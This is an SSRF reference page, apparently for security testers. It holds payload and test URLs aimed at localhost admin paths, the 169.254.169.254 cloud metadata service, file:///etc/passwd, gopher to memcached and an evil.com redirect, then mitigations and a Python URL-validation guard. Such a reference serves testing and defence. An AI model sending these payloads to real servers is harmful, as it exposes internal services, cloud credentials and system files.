# SSRF

**Description:**\
Server-Side Request Forgery (SSRF) is a vulnerability that allows an attacker to make requests to internal or external network resources on behalf of the server. This can lead to unauthorized access to internal services, data exfiltration, and potential network enumeration.

**Example with Scenario:**\
Imagine a web application that fetches user-supplied URLs to display a thumbnail of the website. If the application does not validate the URL properly, an attacker can provide a URL pointing to an internal service, such as `http://localhost/admin`, allowing the attacker to access internal resources.

**Payloads:**

1. **Access Internal Services:**

   ```http
   http://localhost/admin
   http://127.0.0.1/admin
   http://internal-service.local/admin
   ```
2. **Access Metadata Services (Cloud environments):**

   ```http
   http://169.254.169.254/latest/meta-data/
   http://169.254.169.254/computeMetadata/v1/
   ```
3. **Open Redirect Exploitation:**

   ```http
   http://example.com/?url=http://evil.com
   ```
4. **File Inclusion:**

   ```http
   file:///etc/passwd
   file:///C:/Windows/system32/drivers/etc/hosts
   ```
5. **Protocol Smuggling:**

   ```http
   gopher://localhost:11211/_stats
   ftp://ftp.example.com/file.txt
   ```
6. **DNS Rebinding:**

   ```http
   http://malicious.com (which resolves to an internal IP after initial DNS resolution)
   ```

**Test Cases:**

1. **Basic Internal Access:**

   ```http
   http://localhost:80
   http://127.0.0.1:8080
   ```
2. **Private IP Ranges:**

   ```http
   http://192.168.1.1:80
   http://10.0.0.1:8080
   ```
3. **Accessing Metadata Services:**

   ```http
   http://169.254.169.254/latest/meta-data/
   ```
4. **File Access:**

   ```http
   file:///etc/passwd
   file:///C:/Windows/System32/drivers/etc/hosts
   ```
5. **Alternative Protocols:**

   ```http
   ftp://example.com/file.txt
   gopher://localhost:11211/_stats
   ```
6. **Custom Headers:**

   ```http
   http://example.com -H 'Host: internal-service.local'
   ```

**Mitigation:**

1. **Input Validation and Whitelisting:**
   * Validate and sanitize user inputs. Only allow URLs that match a strict whitelist of allowed domains and protocols.
2. **Disable Unnecessary Protocols:**
   * Restrict the application from using protocols other than HTTP/HTTPS.
3. **Network Segmentation:**
   * Ensure the server cannot access internal services or sensitive resources directly.
4. **Metadata Service Protection:**
   * In cloud environments, limit access to metadata services through firewall rules or IAM roles.
5. **Use a URL Parsing Library:**
   * Use a robust URL parsing library to handle URL validation and prevent bypasses using encoding or other tricks.
6. **Timeouts and Retries:**
   * Implement timeouts and retry limits on server-side requests to avoid exploitation of long-running requests.
7. **Monitor and Alert:**
   * Set up monitoring and alerting for unusual server-side request patterns.
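
A resolve-then-check URL guard that implements mitigations 1, 2 and 4 above (hostname allowlist, HTTP/HTTPS only, rejection of loopback, private and link-local targets including the 169.254.169.254 metadata address), added here as an example and not code from the original page. `validate_fetch_target`, `is_public_address`, `allowed_hosts` and the injectable `resolve` callback are assumed names; the function returns the checked IP so that the fetcher connects to that address instead of re-resolving, which closes the DNS-rebinding window listed under payloads.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}   # mitigation 2: no file:, gopher:, ftp:


def system_resolver(host):
    """Every address the OS resolver returns for host (A and AAAA)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_public_address(addr):
    """False for loopback, RFC 1918, link-local (169.254.169.254), etc."""
    ip = ipaddress.ip_address(addr)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped            # [::ffff:127.0.0.1] -> 127.0.0.1
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_fetch_target(url, allowed_hosts=None, resolve=system_resolver):
    """Return (ok, reason, pinned_ip).

    pinned_ip is the address the fetcher must connect to (sending the
    original hostname in Host/SNI); re-resolving at connect time would
    reopen the DNS-rebinding window. allowed_hosts, if given, is a
    lowercase hostname allowlist (mitigation 1)."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed", None
    host = parts.hostname
    if not host:
        return False, "no host in URL", None
    if allowed_hosts is not None and host.lower() not in allowed_hosts:
        return False, f"host {host!r} not on allowlist", None
    try:
        addrs = {str(ipaddress.ip_address(host))}   # IP literal: no DNS
    except ValueError:
        try:                                         # hostname: resolve it
            addrs = resolve(host)
        except OSError as exc:
            return False, f"cannot resolve {host!r}: {exc}", None
    if not addrs:
        return False, f"{host!r} has no addresses", None
    for addr in sorted(addrs):          # every answer must be public
        if not is_public_address(addr):
            return False, f"{host!r} resolves to non-public {addr}", None
    return True, "ok", sorted(addrs)[0]
```

Block the request on any failed check, and log the reason string: a burst of "resolves to non-public" rejections is exactly the unusual request pattern mitigation 7 asks you to alert on.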
